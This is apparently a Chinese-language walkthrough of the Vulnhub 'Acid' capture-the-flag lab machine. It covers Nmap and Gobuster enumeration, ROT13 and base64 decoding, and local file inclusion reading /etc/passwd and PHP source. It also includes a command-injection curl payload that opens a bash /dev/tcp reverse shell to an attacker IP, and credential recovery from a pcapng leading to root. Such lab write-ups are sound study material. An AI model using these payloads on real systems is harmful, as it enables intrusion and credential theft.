[Vulnhub] Acid ROT13+LFI+RCE+Pcapng信息泄露权限提升
字数 799 2025-08-20 18:18:40
Acid 靶机渗透测试教学文档
1. 信息收集
1.1 端口扫描
使用Nmap进行端口扫描:
nmap -p- 192.168.101.157 --min-rate 1000 -sC -sV
发现开放端口:
- 33447/tcp: Apache httpd 2.4.10 (Ubuntu)
1.2 目录枚举
使用Gobuster进行目录扫描:
gobuster dir -u "http://192.168.101.157:33447" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php
发现重要目录:
- /Challenge/
2. 初始访问
2.1 发现acid.txt文件
访问:
http://192.168.101.157:33447/Challenge/acid.txt
文件内容经过ROT13编码和反转:
echo "gkg.qvpn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'|rev
解码后得到:
- Username: test_user
- Email: test@example.com
- Password: 6ZaxN2Vzm9NUJT2y
3. 本地文件包含(LFI)漏洞利用
3.1 利用include.php读取/etc/passwd
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=/etc/passwd" | sed '/<!DOCTYPE html>/,$d'
返回内容为十六进制编码:
0x5933566a4c6e4a34626e413d
解码过程:
echo "5933566a4c6e4a34626e413d" | xxd -r -p |base64 -d | tr 'A-Za-z' 'N-ZA-Mn-za-m'|rev
3.2 读取PHP源代码
使用php://filter读取cake.php源代码:
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=cake.php"
解码:
echo 'PD9waHAKaW5jbHVkZV9vbmNlICdpbmNsdWRlcy9kYl9jb25uZWN0LnBocCc7CmluY2x1ZGVfb25jZSAnaW5jbHVkZXMvZnVuY3Rpb25zLnBocCc7Cj8+CgoKCjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICAgIDxoZWFkPgogICAgICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KICAgICAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9zdHlsZS5jc3MiPgogICAgICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic3R5bGVzL21haW4uY3NzIiAvPgogICAgICAgIDx0aXRsZT4vTWFnaWNfQm94PC90aXRsZT4KICAgIDwvaGVhZD4KICAgIDxib2R5PgogICAgICAgICA8ZGl2IGNsYXNzPSJ3cmFwcGVyIj4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxoMT48Zm9udCBjb2xvcj0nUmVkJz5BaC5oYWFuLi4uLlRoZXJlIGlzIGxvbmcgd2F5IHRvIGdvLi5kdWRlIDotKTwvaDE+PC9mb250Pjxicj48Zm9udCBjb2xvcj0nR3JlZW4nPlBsZWFzZSA8YSBocmVmPSJpbmRleC5waHAiPmxvZ2luPC9hPjwvZiQKICAgIDwvYm9keT4KPC9odG1sPgo8P3BocAoKLyogQ29tZSBvbi4uLi5jYXRjaCB0aGlzIGZpbGUgInRhaWxzLnBocCIgKi8KPz4K'|base64 -d
4. 远程代码执行(RCE)漏洞利用
4.1 发现Magic_Box/tails.php
curl http://192.168.101.157:33447/Challenge/Magic_Box/tails.php
4.2 读取validate.php获取密钥
curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=./Magic_Box/proc/validate.php"
解码后发现密钥:
key:63425
4.3 利用command.php执行命令
curl -X POST -d "IP=;ls&submit=submit" http://192.168.101.157:33447/Challenge/Magic_Box/command.php
4.4 获取反向shell
curl -X POST -d "IP=;/bin/bash -c 'bash%20%3E%26%2Fdev%2Ftcp%2F192.168.101.128%2F10032%200%3E%261'"+"&submit=submit" http://192.168.101.157:33447/Challenge/Magic_Box/command.php
5. 权限提升
5.1 查找pcapng文件
find / -type f -name *.pcap* 2>/tmp/null
发现文件:
/sbin/raw_vs_isi/hint.pcapng
5.2 传输文件到本地
cp /sbin/raw_vs_isi/hint.pcapng /tmp
python3 -m http.server 9999
本地下载:
wget http://192.168.101.157:9999/hint.pcapng
5.3 分析pcapng文件
tshark -r hint.pcapng -qz follow,tcp,ascii,0
发现凭据:
- username: saman
- password: 1337hax0r
5.4 提权到root
su saman
sudo /bin/bash
5.5 获取flag
cat /root/flag.txt
flag内容:
Acid@Makke@Hax0r
6. 关键知识点总结
- 信息收集:Nmap扫描、目录枚举
- 编码分析:ROT13、十六进制、base64编码
- LFI漏洞利用:读取/etc/passwd、PHP文件源码
- RCE漏洞利用:命令注入、反向shell
- 权限提升:分析网络流量文件获取凭据、sudo提权
- 工具使用:curl、tshark、python HTTP服务器